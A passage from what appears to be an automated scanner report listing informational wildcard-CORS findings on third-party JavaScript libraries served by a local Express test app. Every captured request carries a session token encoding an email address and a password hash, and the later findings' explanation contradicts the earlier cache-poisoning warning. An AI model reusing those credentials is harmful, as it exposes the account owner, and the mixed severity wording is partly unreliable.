Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://qecveszgwcyt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 06 Dec 2016 18:56:59 GMT
ETag: W/"5cb5-158d57efc78"
Content-Type: application/javascript
Content-Length: 23733
Date: Sun, 15 Jan 2017 21:12:09 GMT
Connection: close

/*!
* angular-translate - v2.13.1 - 2016-12-06
*
* Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
*/
!function(a,b){"function"==typeof define&&define.amd?define([],fun
...[SNIP]...
2.25. http://192.168.61.143:3000/bower_components/angular/angular.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular/angular.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zxptqasoicfp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular/angular.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zxptqasoicfp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
ETag: W/"27d70-159073e17f8"
Content-Type: application/javascript
Content-Length: 163184
Date: Sun, 15 Jan 2017 21:10:53 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(y){'use strict';function G(a,b){b=b||Error;return function(){var d=arguments[0],c;c="["+(a?a+":":"")+d
...[SNIP]...
2.26. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/bootstrap/dist/js/bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://aylglocmxnue.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://aylglocmxnue.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 25 Jul 2016 15:51:55 GMT
ETag: W/"90b5-15622c16578"
Content-Type: application/javascript
Content-Length: 37045
Date: Sun, 15 Jan 2017 21:12:15 GMT
Connection: close

/*!
* Bootstrap v3.3.7 (http://getbootstrap.com)
* Copyright 2011-2016 Twitter, Inc.
* Licensed under the MIT license
*/
if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requi
...[SNIP]...
2.27. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://sfubtskhhcvo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Referer: http://192.168.61.143:3000/bower_components/bootswatch/slate/bootstrap.min.css
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://sfubtskhhcvo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 30 Jul 2016 21:56:26 GMT
ETag: W/"466c-1563dceeb10"
Content-Type: application/font-woff2
Content-Length: 18028
Date: Sun, 15 Jan 2017 21:16:10 GMT
Connection: close

wOF2......Fl.......\..F    ...M....................?FFTM.. .`..r....
..$..e.6.$..t..0.. .."..Q?webf..e.5.....@..?...
... ..t............,3+.2q.F..YO...&>...b.m.5.Z..H$..Y....{.H    jd.......%....y"......+
...[SNIP]...
2.28. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/clipboard/dist/clipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://woivpcowxrqt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://woivpcowxrqt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 12 Dec 2016 13:54:35 GMT
ETag: W/"282e-158f3504978"
Content-Type: application/javascript
Content-Length: 10286
Date: Sun, 15 Jan 2017 21:12:19 GMT
Connection: close

/*!
* clipboard.js v1.5.16
* https://zenorocha.github.io/clipboard.js
*
* Licensed MIT © Zeno Rocha
*/
!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();els
...[SNIP]...
2.29. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/jquery/dist/jquery.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://cehbxtdgripw.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://cehbxtdgripw.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
ETag: W/"1499c-14d00c472c0"
Content-Type: application/javascript
Content-Length: 84380
Date: Sun, 15 Jan 2017 21:12:36 GMT
Connection: close

/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
...[SNIP]...
2.30. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/moment/min/moment.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ryjgflxoaziq.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/moment/min/moment.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://ryjgflxoaziq.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sun, 04 Dec 2016 05:41:33 GMT
ETag: W/"ef85-158c85a06c8"
Content-Type: application/javascript
Content-Length: 61317
Date: Sun, 15 Jan 2017 21:12:42 GMT
Connection: close

//! moment.js
//! version : 2.17.1
//! authors : Tim Wood, Iskren Chernev, Moment.js contributors
//! license : MIT
//! momentjs.com
!function(a,b){"object"==typeof exports&&"undefined"!=typeof module
...[SNIP]...
2.31. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/ng-file-upload/ng-file-upload-shim.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zrmkxhgxtufr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zrmkxhgxtufr.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
ETag: W/"1c5e-15832c0e460"
Content-Type: application/javascript
Content-Length: 7262
Date: Sun, 15 Jan 2017 21:12:36 GMT
Connection: close

/*! 12.2.13 */
!function(){function a(a,b){window.XMLHttpRequest.prototype[a]=b(window.XMLHttpRequest.prototype[a])}function b(a,b,c){try{Object.defineProperty(a,b,{get:c})}catch(d){}}if(window.FileAP
...[SNIP]...
2.32. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/ng-file-upload/ng-file-upload.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://qarigobwuqby.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this third-party JavaScript library the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://qarigobwuqby.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
ETag: W/"9277-15832c0e460"
Content-Type: application/javascript
Content-Length: 37495
Date: Sun, 15 Jan 2017 21:12:48 GMT
Connection: close

/*! 12.2.13 */
!window.XMLHttpRequest||window.FileAPI&&FileAPI.shouldLoad||(window.XMLHttpRequest.prototype.setRequestHeader=function(a){return function(b,c){if("__setXHR_"===b){var d=c(this);d instan
...[SNIP]...
2.33. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/ngclipboard/dist/ngclipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://fxcklcgejfzo.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this third-party JavaScript library the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://fxcklcgejfzo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 26 Feb 2016 02:29:26 GMT
ETag: W/"280-1531b68cb70"
Content-Type: application/javascript
Content-Length: 640
Date: Sun, 15 Jan 2017 21:12:40 GMT
Connection: close

/*! ngclipboard - v1.1.1 - 2016-02-26
* https://github.com/sachinchoolur/ngclipboard
* Copyright (c) 2016 Sachin; Licensed MIT */
!function(){"use strict";var a,b,c="ngclipboard";"object"==typeof modu
...[SNIP]...
2.34. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/qrcode-generator/js/qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://mbctsgjzwqam.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this third-party JavaScript library the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://mbctsgjzwqam.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 29 Mar 2016 13:26:04 GMT
ETag: W/"afce-153c28d75e0"
Content-Type: application/javascript
Content-Length: 45006
Date: Sun, 15 Jan 2017 21:12:52 GMT
Connection: close

//---------------------------------------------------------------------
//
// QR Code Generator for JavaScript
//
// Copyright (c) 2009 Kazuhiko Arase
//
// URL: http://www.d-project.com/
//
// Licens
...[SNIP]...
2.35. http://192.168.61.143:3000/bower_components/underscore/underscore.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/underscore/underscore.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://dnwhusulvoxp.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this third-party JavaScript library the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /bower_components/underscore/underscore.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
